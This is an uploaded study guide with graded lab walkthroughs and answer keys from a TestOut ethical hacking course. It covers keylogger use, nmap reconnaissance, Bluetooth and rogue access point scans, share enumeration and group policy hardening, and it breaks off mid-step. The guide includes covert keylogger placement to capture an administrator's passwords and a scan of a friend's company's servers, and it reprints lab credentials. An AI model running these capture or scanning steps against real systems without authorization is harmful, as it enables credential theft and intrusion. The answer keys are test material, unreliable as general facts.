TestOut Ethical Hacker Pro Domain Review
School: Sinclair Community College
Course: 2650
Subject: Information Systems
Date: Dec 6, 2023
Pages: 130
Uploaded by Raedwulf
A.2.1 Pro Domain 1: Prepare
QUESTION 1:
Recently, the administrative assistant found a foreign device
connected to the ITAdmin computer while updating some of their
hardware. The device was turned over to you, and you have
determined that it is a keylogger. You need to sift through the
information on the keylogger to find which accounts may be
compromised.
In this lab, your task is to determine which corporate accounts have
been compromised as follows:
• Plug the keylogger into ITAdmin's USB port.
• Use the keyboard combination of SBK to toggle the USB keylogger from keylogger mode to USB flash drive mode.
• Open the LOG.txt file and inspect the contents.
• Scan the document for corporate passwords or financial information.
• Answer the questions.
Your Performance
Your Score: 3 of 3 (100%)
Pass Status: Pass
Elapsed Time: 6 minutes 18 seconds
Required Score: 100%
Task Summary
Lab Questions
Plug the keylogger into ITAdmin
Q1: Which of the following accounts were breached?
Q2: What credit card number was captured by the keylogger?
Explanation
In this lab, your task is to determine which corporate accounts have been compromised:
• Plug the keylogger into ITAdmin's USB port.
• Use the keyboard combination of SBK to toggle the USB keylogger from keylogger mode to USB flash drive mode.
• Open the LOG.txt file and inspect the contents.
• Scan the document for corporate passwords or financial information.
• Answer the questions.
Complete this lab as follows:
1. On the Shelf, expand Storage Devices.
2. From the shelf, drag the USB Keylogger to a USB port on ITAdmin.
3. On the monitor, select Click to view Windows 10.
4. Press S + B + K to toggle from the keylogger mode to the flash drive mode.
5. Select Tap to choose what happens with removable drives.
6. Select Open folder to view files.
7. Double-click LOG.txt to open the file.
8. Maximize the window for easier viewing.
9. In the top right, select Answer Questions.
10. In the file, find which account passwords were captured.
11. In the file, find any compromised financial information.
12. Select Score Lab.
Lab Questions:
1. Which of the following accounts were breached?
   a. Amazon.com
   b. Email.com
2. What credit card number did the keylogger capture?
   a. 4556358591800117
QUESTION 2:
The CEO of CorpNet.xyz has hired your firm to obtain some
passwords for their company. A senior IT network administrator, Oliver
Lennon, is suspected of wrongdoing and suspects he is going to be
fired from the company. The problem is that he changed many of the
standard passwords known to only the top executives, and now he is
the only one that knows them. Your company has completed the legal
documents needed to protect you and the company.
With the help of a CorpNet.xyz executive, you were allowed into the IT
Admin's office after hours. You unplugged the keyboard from the back
of the ITAdmin computer and placed a USB keylogger into the USB,
then plugged the USB keyboard into the keylogger. After a week, the
company executive lets you back into the IT Admin's office after hours
again.
In this lab, your task is to use the keylogger to recover the changed
passwords as follows:
• Move the keyboard USB connector to a different USB port on ITAdmin.
• Remove the keylogger from ITAdmin.
• Move the consultant laptop from the Shelf to the Workspace.
• Plug the keylogger into the consultant laptop's USB drive.
• Use the SBK key combination to toggle the USB keylogger from keylogger mode to USB flash drive mode.
• Open the LOG.txt file and inspect the contents.
• Find the olennon account's password.
• Find the Administrator account's password.
• Answer the questions.
Your Performance
Your Score: 4 of 4 (100%)
Pass Status: Pass
Elapsed Time: 4 minutes 16 seconds
Required Score: 100%
Task Summary
Required Actions & Questions
Plug the keyboard into the Administrator's machine
Plug the keylogger into the consultant's laptop
Q1: What is the olennon user's password?
Q2: What is the Administrator password?
Explanation
In this lab, your task is to use the keylogger to recover the changed passwords as follows:
• Move the keyboard USB connector to a different USB port on ITAdmin.
• Remove the keylogger from ITAdmin.
• Move the consultant laptop from the Shelf to the Workspace.
• Plug the keylogger into the consultant laptop's USB drive.
• Use the SBK key combination to toggle the USB keylogger from keylogger mode to USB flash drive mode.
• Open the LOG.txt file and inspect the contents.
• Find the olennon account's password.
• Find the Administrator account's password.
• Answer the questions.
Complete this lab as follows:
1. Above the computer, select Back to view the back of the computer.
2. On the back of the computer, drag the USB Type A connector for the keyboard to another USB port on the computer.
3. On the Shelf, expand System Cases.
4. Drag the Laptop to the Workspace.
5. Above the laptop, select Back to view the back of the laptop.
6. From the computer, drag the keylogger to a USB port on the laptop.
7. Above the laptop, select Front to view the front of the laptop.
8. On the laptop, select Click to view Windows 10.
9. Press S + B + K to toggle from the keylogger mode to the flash drive mode.
10. Select Tap to choose what happens with removable drives.
11. Select Open folder to view files.
12. Double-click LOG.txt to open the file.
13. In the top right, select Answer Questions.
14. Answer the questions.
15. Select Score Lab.
Lab Questions:
1. What was the olennon user’s password?
   a. P@ssw0rd
2. What is the Administrator password?
   a. 4Lm87Qde
QUESTION 3:
You work for a penetration testing consulting company. Your manager
has asked you to begin gathering information about www.corpnet.xyz.
In this lab, your task is to perform reconnaissance on
www.corpnet.xyz and to find potentially vulnerable ports on the
servers in the CorpNet networks as follows:
• On Consult-Lap, use the Whois.org site to determine the domain name servers used by www.corpnet.xyz.
• On Consult-Lap, use nslookup hostname nameserver to determine the primary web server address.
• On Consult-Lap2, use Zenmap to perform an nmap search for open ports for the 198.28.1.0/24 network.
• Answer the questions.
Your Performance
Your Score: 6 of 6 (100%)
Pass Status: Pass
Elapsed Time: 9 minutes 40 seconds
Required Score: 100%
Task Summary
Required Actions & Questions
Used WhoIs.org to discover name servers
Q1: Which of the following Name Servers are being used by CorpNet.xyz?
Used nslookup to discover www.corpnet.xyz IP address
Q2: What is the IP address for CorpNet.xyz?
Used nmap to discover open ports for ftp and telnet
Q3: Which of the following servers use the potentially vulnerable ftp and telnet ports?
Explanation
In this lab, your task is to perform reconnaissance on www.corpnet.xyz and to find potentially vulnerable ports on the servers in the CorpNet networks as follows:
• On Consult-Lap, use the Whois.org site to determine the domain name servers used by www.corpnet.xyz.
• On Consult-Lap, use nslookup to determine the primary web server address.
• On Consult-Lap2, use Zenmap to perform an nmap search for open ports for the 198.28.1.0/24 network.
• Answer the questions.
Complete this lab as follows:
1. Find the name servers used by www.corpnet.xyz as follows:
   a. From the taskbar, open Chrome.
   b. In the URL field, type whois.org and press Enter.
   c. In the Search for a domain name field, enter www.corpnet.xyz.
   d. Select Search.
   e. In the top right, select Answer Questions.
   f. Answer question 1.
2. Find the IP address used by www.corpnet.xyz as follows:
   a. Right-click Start and select Windows PowerShell (Admin).
   b. At the prompt, type nslookup www.corpnet.xyz ns1.nethost.net and press Enter.
   c. Answer question 2.
   d. Minimize the question dialog.
3. Use Zenmap to run an nmap command to scan for open ports as follows:
   a. From the navigation tabs, select Buildings.
   b. Under Red Cell, select Consult-Lap2.
   c. From the Favorites bar, open Zenmap.
   d. Maximize Zenmap for easier viewing.
   e. In the Command field type nmap -p- 198.28.1.0/24.
   f. Select Scan to scan for open ports on all servers located on this network.
   g. In the top right, select Answer Questions.
   h. Answer question 3.
   i. Select Score Lab.
Lab Questions:
1. Which of the following name servers are being used by CorpNet.xyz?
   a. NS1.NETHOST.NET
   b. NS2.NETHOST.NET
2. What is the IP address for CorpNet.xyz?
   a. 198.28.1.1
3. Which of the following servers use the potentially vulnerable FTP and Telnet ports? (Select all that apply.)
   a. 198.28.1.3
   b. 198.28.1.4
QUESTION 4:
You work for a penetration testing consulting company. Your manager
is concerned about the vulnerability of the company's database server
that contains the finance and accounting systems. He wants you to
perform a port scan with nmap to identify all the open ports on the
server (192.168.0.45).
In this lab, your task is to perform a port scan using nmap in Terminal.
Your Performance
Your Score: 1 of 1 (100%)
Pass Status: Pass
Elapsed Time: 20 seconds
Required Score: 100%
Task Summary
Required Actions
Perform a port scan using nmap
Explanation
In this lab, your task is to perform a port scan using nmap in Terminal.
Complete this lab as follows:
1. From the Favorites bar, open Terminal.
2. At the prompt, type nmap -p- 192.168.0.45.
3. Press Enter.
QUESTION 5:
You are the IT security administrator, and you are learning to use
some ethical hacking tools. Your friend at a partner company asked
you to scan his company's public-facing servers to see if they have
any obvious vulnerabilities. The Partnernet servers are on the
73.44.216.0 network.
In this lab, your task is to:
• Perform a Zenmap scan using the following information:
   o Network address: 73.44.216.0
   o Subnet mask: Class C
• Answer the questions.
Your Performance
Your Score: 3 of 3 (100%)
Pass Status: Pass
Elapsed Time: 1 minute 10 seconds
Required Score: 100%
Task Summary
Required Actions & Questions
Scan the 73.44.216.0/24 network
Q1: Do your friend's public facing servers have any obvious security vulnerabilities?
Q2: Which service vulnerability should be remediated first?
Explanation
In this lab, your task is to:
• Perform a Zenmap scan using the following information:
   o Network address: 73.44.216.0
   o Subnet mask: Class C
• Answer the questions.
Complete the following:
1. From the Favorites bar, open Zenmap.
2. At the prompt, type nmap 73.44.216.0/24.
3. Select Scan.
4. Find the network vulnerabilities in the output.
5. In the top right, select Answer Questions.
6. Answer the questions.
7. Select Score Lab.
Lab Questions:
1. Do your friend’s public-facing servers have any obvious security vulnerabilities?
   a. Yes
2. Which service vulnerability should be remediated first?
   a. Telnet
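One way to triage the scan output from Questions 3 and 5 instead of reading it by eye, as an added example that is not part of the original lab: the Python below parses nmap's normal text output and lists open cleartext services in remediation order, Telnet first. The scan text, the host name in it and the priority numbers are constructed assumptions.

```python
import re

# Constructed sample of nmap "normal" output, the text Zenmap shows in its
# Nmap Output tab. The hosts, names and port states are illustrative only.
SAMPLE_SCAN = """\
Nmap scan report for 198.28.1.1
Host is up (0.00020s latency).
Not shown: 65533 closed ports
PORT    STATE SERVICE
80/tcp  open  http
443/tcp open  https

Nmap scan report for 198.28.1.3
Host is up (0.00021s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE
21/tcp open  ftp
23/tcp open  telnet

Nmap scan report for files.example.test (198.28.1.4)
Host is up (0.00019s latency).
Not shown: 65532 closed ports
PORT   STATE    SERVICE
21/tcp open     ftp
23/tcp filtered telnet
80/tcp open     http
"""

# Cleartext services and the order to fix them in (1 = first). Ranking Telnet
# ahead of FTP follows the lab answer; the numbers themselves are an assumption.
CLEARTEXT = {23: ("telnet", 1), 21: ("ftp", 2)}

# Header line is either "... for <ip>" or "... for <name> (<ip>)".
HOST_RE = re.compile(
    r"^Nmap scan report for (?:(\S+) \()?(\d{1,3}(?:\.\d{1,3}){3})\)?$")
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)")


def parse_nmap_normal(text):
    """Return {ip: [(port, proto, state, service), ...]} from normal output."""
    hosts, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        host = HOST_RE.match(line)
        if host:
            current = host.group(2)
            hosts[current] = []
            continue
        port = PORT_RE.match(line)
        if port and current is not None:
            hosts[current].append(
                (int(port.group(1)), port.group(2), port.group(3), port.group(4)))
    return hosts


def cleartext_findings(hosts):
    """List (priority, ip, port, service) for open cleartext ports, worst first.

    Only state "open" counts: a filtered port was not shown to be reachable.
    """
    findings = []
    for ip, ports in hosts.items():
        for port, proto, state, _service in ports:
            if proto == "tcp" and state == "open" and port in CLEARTEXT:
                name, priority = CLEARTEXT[port]
                findings.append((priority, ip, port, name))
    ip_key = lambda ip: tuple(int(octet) for octet in ip.split("."))
    return sorted(findings, key=lambda f: (f[0], ip_key(f[1])))


if __name__ == "__main__":
    for priority, ip, port, name in cleartext_findings(parse_nmap_normal(SAMPLE_SCAN)):
        print(f"P{priority}  {ip}:{port}  {name}")
```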
QUESTION 6:
You are the IT security administrator for a small corporate network. To
protect your Bluetooth devices from hackers, you need to discover
which Bluetooth devices are running in your company and gather
information on each.
In this lab, your task is to scan for Bluetooth devices using Terminal as
follows:
• Use hciconfig to discover and enable the onboard Bluetooth adapter.
• Use hcitool to scan for Bluetooth devices and find the class ID.
• Use l2ping to determine if the Bluetooth device is alive and within range.
• Use sdptool to query Philip's Dell Laptop to determine the Bluetooth services available on the device.
• Answer the question.
Your Performance
Your Score: 5 of 5 (100%)
Pass Status: Pass
Elapsed Time: 3 minutes 2 seconds
Required Score: 100%
Task Summary
Required Actions & Questions
Run hciconfig to enable the Bluetooth adapter
Run hcitool to scan for the Bluetooth devices
Use l2ping to determine if a Bluetooth device is up
Run sdptool to query Philip's Dell Laptop
Q1: Using the MAC address, what is the class ID number for Joanna's Braven speaker?
Explanation
In this lab, your task is to scan for Bluetooth devices using Terminal as follows:
• Use hciconfig to discover and enable the onboard Bluetooth adapter.
• Use hcitool to scan for Bluetooth devices and find the class ID.
• Use l2ping to determine if the Bluetooth device is alive and within range.
• Use sdptool to query Philip's Dell Laptop to determine the Bluetooth services available on the device.
• Answer the question.
Complete this lab as follows:
1. From the Favorites bar, open Terminal.
2. At the prompt, type hciconfig and press Enter to view the onboard Bluetooth adapter.
3. Type hciconfig hci0 up and press Enter to initialize the adapter.
4. Type hciconfig and press Enter to verify that the adapter is up and running.
5. Type hcitool scan and press Enter to view the detected Bluetooth devices and their MAC addresses.
6. Type l2ping MAC address and press Enter to determine if the Bluetooth device is in range.
7. Press Ctrl + c to stop the ping process.
8. Repeat steps 6–7 for each device.
9. Type sdptool browse B0:52:23:92:EF:CC and press Enter to view the details for Philip's Dell Laptop.
10. Type hcitool inq and press Enter to determine the clock offset and class for each device.
11. In the top left, select Answer Questions.
12. Select the correct answer.
13. Select Score Lab.
Lab Questions:
1. Using the MAC address, what is the class ID number for Joanna’s Braven speaker?
   a. 0x240404
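The class value that hcitool inq reports is a bit field, so it can be decoded for a device inventory. The Python below is an added example, not part of the original lab: it decodes values such as the 0x240404 answer above using the Bluetooth Class of Device layout. The inquiry output, the speaker's MAC address and the laptop's class value are constructed; only B0:52:23:92:EF:CC and 0x240404 come from the lab.

```python
import re

# Bluetooth Class of Device (CoD), 24 bits:
#   bits 23-13  major service classes (one flag per bit)
#   bits 12-8   major device class
#   bits 7-2    minor device class (meaning depends on the major class)
#   bits 1-0    format type
SERVICE_BITS = {
    13: "Limited Discoverable Mode", 16: "Positioning", 17: "Networking",
    18: "Rendering", 19: "Capturing", 20: "Object Transfer",
    21: "Audio", 22: "Telephony", 23: "Information",
}
MAJOR = {
    0: "Miscellaneous", 1: "Computer", 2: "Phone",
    3: "LAN/Network Access Point", 4: "Audio/Video", 5: "Peripheral",
    6: "Imaging", 7: "Wearable", 8: "Toy", 9: "Health", 31: "Uncategorized",
}
# Minor classes for the two major classes this lab meets.
MINOR = {
    1: {0: "Uncategorized", 1: "Desktop workstation", 2: "Server-class computer",
        3: "Laptop", 4: "Handheld PC/PDA", 5: "Palm-size PC/PDA",
        6: "Wearable computer", 7: "Tablet"},
    4: {0: "Uncategorized", 1: "Wearable Headset", 2: "Hands-free",
        4: "Microphone", 5: "Loudspeaker", 6: "Headphones",
        7: "Portable Audio", 8: "Car Audio", 10: "HiFi Audio"},
}

# Constructed `hcitool inq` output. The first MAC address, both clock offsets
# and the laptop's class value are made up for illustration.
SAMPLE_INQ = (
    "Inquiring ...\n"
    "\t00:11:22:33:44:55\tclock offset: 0x2b4d\tclass: 0x240404\n"
    "\tB0:52:23:92:EF:CC\tclock offset: 0x61f0\tclass: 0x1c010c\n"
)
INQ_RE = re.compile(
    r"((?:[0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2})\s+clock offset:\s*0x[0-9A-Fa-f]+"
    r"\s+class:\s*(0x[0-9A-Fa-f]+)")


def decode_cod(cod):
    """Split a 24-bit class value into service flags, major and minor class."""
    major = (cod >> 8) & 0x1F
    minor = (cod >> 2) & 0x3F
    services = [name for bit, name in sorted(SERVICE_BITS.items())
                if cod & (1 << bit)]
    return {
        "services": services,
        "major": MAJOR.get(major, f"Reserved ({major})"),
        "minor": MINOR.get(major, {}).get(minor, f"minor {minor}"),
    }


def inventory(inq_output):
    """Map each MAC address in `hcitool inq` output to its decoded class."""
    return {m.group(1).upper(): decode_cod(int(m.group(2), 16))
            for m in INQ_RE.finditer(inq_output)}


if __name__ == "__main__":
    for mac, info in inventory(SAMPLE_INQ).items():
        print(mac, info["major"], "/", info["minor"], info["services"])
```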
QUESTION 7:
You are the IT security administrator for a small corporate network. To
achieve Payment Card Industry Data Security Standard (PCI DSS)
certification, you are required to scan for rogue access points
quarterly.
In this lab, your task is to scan for rogue wireless access points using
Terminal as follows:
• Use airmon-ng to discover and enable the onboard wireless adapter.
• Use airodump-ng to scan for wireless access points.
• Answer the questions.
Your Performance
Your Score: 5 of 5 (100%)
Pass Status: Pass
Elapsed Time: 6 minutes 20 seconds
Required Score: 100%
Task Summary
Required Actions & Questions
Discover and enable the onboard wireless adapter
Scan for wireless access points
Q1: What is most likely the ESSID of the rogue access point?
Q2: What is the signal power of the rogue access point?
Q3: What is the frequency channel used by the rogue access point?
Explanation
In this lab, your task is to scan for rogue wireless access points using Terminal as follows:
• Use airmon-ng to discover and enable the onboard wireless adapter.
• Use airodump-ng to scan for wireless access points.
• Answer the questions.
Complete this lab as follows:
1. From the Favorites bar, open Terminal.
2. At the prompt, type airmon-ng and press Enter to view and find the name of the wireless adapter.
3. Type airmon-ng start wlp1s0 and press Enter to put the adapter in monitor mode.
4. Type airmon-ng and press Enter to view the new name of the wireless adapter.
5. Type airodump-ng wlp1s0mon and press Enter to scan for wireless access points.
6. After a few seconds, press Ctrl + c to stop the scan.
7. In the top right, select Answer Questions.
8. Answer the questions.
9. Select Score Lab.
Lab Questions:
1. What is most likely to be the rogue access point ESSID?
   a. CoffeeShop
2. What is the rogue access point’s signal power?
   a. -90
3. What frequency channel is the rogue access point using?
   a. 11
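For a recurring quarterly scan, the comparison against known access points can be scripted. The Python below is an added example, not part of the original lab: it assumes the scan was saved in airodump-ng's CSV output format and checks each access point against a hypothetical inventory of authorized ESSID/BSSID pairs. Only the CoffeeShop ESSID, its power and its channel come from the lab answers; every BSSID, the CorpNet ESSID and the inventory are constructed.

```python
import csv
import io

# Constructed airodump-ng CSV capture (the file starts with a blank line and
# lists access points first, then client stations).
SAMPLE_CSV = """\

BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
02:00:00:AA:00:01, 2023-12-06 10:00:01, 2023-12-06 10:00:20,  1,  54, WPA2, CCMP, PSK, -40,      120,        0,   0.  0.  0.  0,   7, CorpNet,
02:00:00:AA:00:02, 2023-12-06 10:00:01, 2023-12-06 10:00:20,  6,  54, WPA2, CCMP, PSK, -52,       98,        0,   0.  0.  0.  0,   7, CorpNet,
02:00:00:BB:00:09, 2023-12-06 10:00:03, 2023-12-06 10:00:19,  6,  54, OPN, , , -61,       40,        0,   0.  0.  0.  0,   7, CorpNet,
02:00:00:CC:00:07, 2023-12-06 10:00:02, 2023-12-06 10:00:20, 11,  54, OPN, , , -90,       12,        0,   0.  0.  0.  0,  10, CoffeeShop,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
02:00:00:DD:00:03, 2023-12-06 10:00:05, 2023-12-06 10:00:18, -60,       14, 02:00:00:AA:00:01, CorpNet
"""

# Hypothetical inventory: ESSID -> BSSIDs of the radios the company operates.
AUTHORIZED = {"CorpNet": {"02:00:00:AA:00:01", "02:00:00:AA:00:02"}}

# Review order: a copy of our own network name is more urgent than a stranger.
ORDER = {"spoofed-essid": 0, "unknown-essid": 1}


def parse_access_points(text):
    """Return the access-point rows of an airodump-ng CSV as dicts."""
    aps, header = [], None
    for row in csv.reader(io.StringIO(text), skipinitialspace=True):
        if not row:
            continue                      # blank separator lines
        first = row[0].strip()
        if first == "BSSID":
            header = [h.strip() for h in row]
        elif first == "Station MAC":
            break                         # client section; not needed here
        elif header and len(row) >= len(header):
            rec = dict(zip(header, (cell.strip() for cell in row)))
            aps.append({
                "bssid": rec["BSSID"].upper(),
                "essid": rec["ESSID"],
                "channel": int(rec["channel"]),
                "power": int(rec["Power"]),
                "privacy": rec["Privacy"],
            })
    return aps


def classify(ap, authorized):
    """authorized, spoofed-essid (our name, unknown radio) or unknown-essid."""
    if ap["essid"] in authorized:
        if ap["bssid"] in authorized[ap["essid"]]:
            return "authorized"
        return "spoofed-essid"
    return "unknown-essid"


def find_rogues(aps, authorized):
    """List (verdict, essid, bssid, channel, power); strongest signal first."""
    hits = []
    for ap in aps:
        verdict = classify(ap, authorized)
        if verdict != "authorized":
            hits.append((verdict, ap["essid"], ap["bssid"],
                         ap["channel"], ap["power"]))
    return sorted(hits, key=lambda h: (ORDER[h[0]], -h[4]))


if __name__ == "__main__":
    for hit in find_rogues(parse_access_points(SAMPLE_CSV), AUTHORIZED):
        print(*hit)
```

An ESSID that itself contains a comma would shift the columns; handle that case before relying on this for real captures.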
QUESTION 8:
You are the IT security administrator for a small corporate network.
You have some security issues on a few Internet of Things (IoT)
devices. You can use the Security Evaluator to find these problems.
In this lab, your task is to:
• Find a device using the IP address of 192.168.0.54.
• Find all devices using an IP address in the range of 192.168.0.60 through 192.168.0.69.
• Answer the questions.
Your Performance
Your Score: 5 of 5 (100%)
Pass Status: Pass
Elapsed Time: 5 minutes 44 seconds
Required Score: 100%
Task Summary
Required Actions & Questions
Scanned 192.168.0.54
Q1: What is the name of the IoT device with the IP address of 192.168.0.54?
Q2: How many issues exist for the device with the IP address of 192.168.0.54?
Search for issues using IP range
Q3: In the IP address range of 192.168.0.60 through 192.168.0.69, which IP addresses had issues?
Explanation
In this lab, your task is to:
• Find a device using the IP address of 192.168.0.54.
• Find all devices using an IP address in the range of 192.168.0.60 through 192.168.0.69.
• Answer the questions.
Complete this lab as follows:
1. Run a Security Evaluator report for 192.168.0.54 as follows:
   a. From the taskbar, open Security Evaluator.
   b. Next to Target, select the Target icon to select a new target.
   c. Select IPv4 Address.
   d. Enter 192.168.0.54 as the IP address.
   e. Click OK.
   f. Next to Status, select the Run/Rerun Security Evaluation icon to run a security evaluation.
   g. In the top right, select Answer Questions.
   h. Answer questions 1 and 2.
2. Run a Security Evaluator report for an IP range of 192.168.0.60 through 192.168.0.69 as follows:
   a. From the Security Evaluator, select the Target icon to select a new target.
   b. Select IPv4 Range.
   c. In the left field, type 192.168.0.60 as the beginning IP address.
   d. In the right field, type 192.168.0.69 as the ending IP address.
   e. Click OK.
   f. Next to Status, select the Run/Rerun Security Evaluation icon to run a security evaluation.
   g. Answer question 3.
   h. Select Score Lab.
Lab Questions:
1. What is the name of the IoT device with the IP address of 192.168.0.54?
   a. Wireless Thermostat
2. How many issues exist for the device with the IP address of 192.168.0.54?
   a. 3
3. In the IP address range of 192.168.0.60 through 192.168.0.69, which IP addresses had issues? (Select all that apply.)
   a. 192.168.0.66
QUESTION 9:
You are the IT security administrator for a small corporate network.
You're scanning your local network to determine potential
vulnerabilities.
In this lab, your task is to complete the following:
• Use Zenmap to determine the operating system of the hosts on your network.
• On ITAdmin, use net view to check for shared folders on CorpFiles12 and CorpFiles16.
• Map the H: drive to the Confidential folder on CorpFiles16.
• View the files in the Employee Records folder.
• Answer the questions.
Your Performance
Your Score: 6 of 6 (100%)
Pass Status: Pass
Elapsed Time: 5 minutes 30 seconds
Required Score: 100%
Task Summary
Required Actions & Questions
Use nmap -O 192.168.0.0/24 to scan for operating systems on the local network
Q1: Which computers on the network have a Linux operating system?
Use net view to check the shared folders on CorpFiles12
Use net view to check the shared folders on CorpFiles16
Use net use to map a drive to the confidential folder on CorpFiles16
Q2: Which employee records are found on the open share?
Explanation
In this lab, your task is to complete the following:
• Use Zenmap to determine the operating system of the hosts on your network.
• On ITAdmin, use net view to check for shared folders on CorpFiles12 and CorpFiles16.
• Map the H: drive to the Confidential folder on CorpFiles16.
• View the files in the Employee Records folder.
• Answer the questions.
Complete this lab as follows:
1. Scan for operating systems on the network as follows:
   a. From the Favorites bar, open Zenmap.
   b. In the Command field, type nmap -O 192.168.0.0/24.
   c. Select Scan to scan the local subnet.
   d. In the nmap scan, find the identified operating systems.
   e. In the top right, select Answer Questions.
   f. Answer question 1.
   The nmap -O command may have a hard time recognizing the Windows OS, but can easily detect Linux.
2. View the shared folders on CorpFiles12 and CorpFiles16 as follows:
   a. From top navigation tabs, select IT Administration.
   b. On the ITAdmin monitor, select Click to view Windows 10.
   c. Right-click Start and select Windows PowerShell (Admin).
   d. At the prompt, type net view corpfiles12 and press Enter.
   e. Type net view corpfiles16 and press Enter.
3. Map the H: drive to the Confidential folder on CorpFiles16 as follows:
   a. Type net use h: \\corpfiles16\confidential and press Enter.
   b. Type h: and press Enter to change to the H: drive.
4. View the files in the Employee Records folder as follows:
   a. Type dir and press Enter to view the folders available on the drive.
   b. Type cd Employee Records and press Enter.
   c. Type dir and press Enter to view the employee records.
   d. Answer question 2.
   e. Select Score Lab.
Lab Questions:
1. Which computers on the network have a Linux operating system?
   a. 192.168.0.45
   b. 192.168.0.46
2. Which employee records are found on the open share? (Choose all that apply.)
   a. Ralph Debourne
   b. Ben Bispo
   c. Beth Bondo
QUESTION 10:
You are a cybersecurity expert performing a penetration test for a
client. Your client is concerned that hackers may be performing port
scanning on the network, hoping to find open ports that could leave
the company vulnerable to attacks.
In this lab, your task is to use nmap to detect open ports as follows:
• Scan the following network addresses:
   o 198.28.1.0/24
   o 192.168.0.0/24
• Find and report any open ports, especially those susceptible to hacking attacks.
• Answer the questions.
Your Performance
Your Score: 4 of 4 (100%)
Pass Status: Pass
Elapsed Time: 7 minutes 3 seconds
Required Score: 100%
Task Summary
Lab Questions
Run a port scan on 198.28.1.0
Run a port scan on 192.168.0.0
Q1: Which networks contain open ports?
Q2: Which of the following servers have vulnerable open ports?
Explanation
In this lab, your task is to use nmap to detect open ports as follows:
• Scan the following network addresses:
   o 198.28.1.0/24
   o 192.168.0.0/24
• Find and report any open ports, especially those susceptible to hacking attacks.
• Answer the questions.
Complete this lab as follows:
1. From the Favorites bar, open Terminal.
2. At the prompt, type nmap -p- 198.28.1.0/24 and press Enter to scan for open ports on all servers located on this network.
3. Type nmap -p- 192.168.0.0/24 and press Enter to scan for open ports on all the servers located on this network.
4. In the top right, select Answer Questions.
5. Answer the questions.
6. Select Score Lab.
Lab Questions:
1. Which networks contain open ports?
   a. 192.168.0.0
2. Which of the following servers have vulnerable open ports? (Select all that apply.)
   a. 192.168.0.8
   b. 192.168.0.10
   c. 192.168.0.11
   d. 192.168.0.14
QUESTION 11:
You work for a penetration testing consulting company. During an
internal penetration test, you find that VNC is being used on the
network, which violates your company's security policies. It was
installed to maintain access by a malicious employee.
In this lab, your task is to complete the following:
• From the IT-Laptop, use Zenmap to scan all computers on the network to see if any devices have port 5900 (VNC) open.
• Answer Question 1.
• Go to the suspect computer and uninstall VNC.
• From the suspect computer, run netstat to verify the ports for VNC are closed.
IP Address      Computer
192.168.0.30    Exec
192.168.0.31    ITAdmin
192.168.0.32    Gst-Lap
192.168.0.33    Office1
192.168.0.34    Office2
192.168.0.45    Support
192.168.0.46    IT-Laptop
Your Performance
Your Score: 4 of 4 (100%)
Pass Status: Pass
Elapsed Time: 5 minutes 48 seconds
Required Score: 100%
Task Summary
Required Actions & Questions
Use nmap to find any machine running VNC
Q1: Which server has port 5900 open?
Uninstall VNC
Run netstat to verify the ports for VNC are closed
Explanation
In this lab, your task is to complete the following:
• Use Zenmap to scan for open ports running VNC. Use the table below to help you identify the computer.
• Go to the suspect computer and uninstall VNC.
• From the suspect computer, run netstat to verify the ports for VNC are closed.
IP Address      Computer
192.168.0.30    Exec
192.168.0.31    ITAdmin
192.168.0.32    Gst-Lap
192.168.0.33    Office1
192.168.0.34    Office2
192.168.0.45    Support
192.168.0.46    IT-Laptop
Complete this lab as follows:
1. Find the server that has port 5900 open.
   a. From the Favorites bar, open Zenmap.
   b. In the Command field, use nmap -p 5900 192.168.0.0/24.
   c. Select Scan.
   d. From the results, find the computer with port 5900 open.
   e. From the top right, select Answer Questions.
   f. Answer Question 1.
   g. Minimize the Lab Questions window.
2. Uninstall VNC from the computer that has port 5900 open.
   a. From the top navigation tabs, select Floor 1 Overview.
   b. Find and select the computer that has port 5900 open. (Open the Question window if needed.)
   c. At the prompt, type netstat and press Enter to confirm the port is open on the machine.
   d. Type dnf list vnc and press Enter to find the package name.
   e. Type dnf erase libvncserver and press Enter.
   f. Press Y and press Enter to uninstall the package.
   g. Type netstat and press Enter to confirm the port has been closed on the machine.
   h. From the top right, select Answer Questions.
   i. Select Score Lab.
Lab Questions:
1. Which IP address had port 5900 open?
   a. Support - 192.168.0.45
QUESTION 12:
You are the IT security administrator for a small corporate network.
You are performing vulnerability scans on your network. Use the
Security Evaluator tool to run a vulnerability scan on the CorpDC
domain controller.
In this lab, your task is to:
• Run a vulnerability scan for the CorpDC domain controller using the Security Evaluator on the taskbar.
• Remediate the vulnerabilities in the Default Domain Policy using Group Policy Management on CorpDC.
• Re-run a vulnerability scan to make sure all of the issues are resolved.
Your Performance
Your Score: 7 of 7 (100%)
Pass Status: Pass
Elapsed Time: 11 minutes 9 seconds
Required Score: 100%
Task Summary
Required Actions
Reset account lockout counter after 60 minutes
Use a minimum password length of 14 characters
Use a minimum password age of 1 day
Enforce password history for 24 passwords
Event log retention set not to overwrite events
   Application log
   Security log
   System log
DCOM Server Process Launcher service disabled
Task Scheduler service disabled
Explanation
In this lab, your task is to:
• Run a vulnerability scan for the CorpDC domain controller using the Security Evaluator on the taskbar.
• Remediate the vulnerabilities in the Default Domain Policy using Group Policy Management on CorpDC.
Policy                                                  Setting
Account Lockout: Reset account lockout counter after    60 Minutes
Password Policy: Minimum password length                14 Characters
Password Policy: Minimum password age                   1 Day
Password Policy: Enforce password history               24 Passwords
Event Log: Retention method for application log         Do not overwrite events (clear log manually)
Event Log: Retention method for security log            Do not overwrite events (clear log manually)
Event Log: Retention method for system log              Do not overwrite events (clear log manually)
System Services: DCOM Server Process Launcher           Disabled
System Services: Task Scheduler                         Disabled
• Re-run a vulnerability scan to make sure all of the issues are resolved.
Complete this lab as follows:
1. Run a Security Evaluator report as follows:
   a. From the taskbar, open Security Evaluator.
   b. Next to Local Machine, select the Target icon to select a new target.
   c. Select Domain Controller.
   d. From the Domain Controller drop-down list, select CorpDC as the target.
   e. Click OK.
   f. Select Status Run/Rerun Security Evaluation icon to run the security evaluation.
   g. Review the results to determine which issues you need to resolve on CorpDC.
2. From the top navigation tabs, select Floor 1.
3. Under Networking Closet, select CorpDC.
4. Remediate password issues in Account Policies as follows:
   a. From Server Manager, select Tools > Group Policy Management.
   b. Maximize the window for easier viewing.
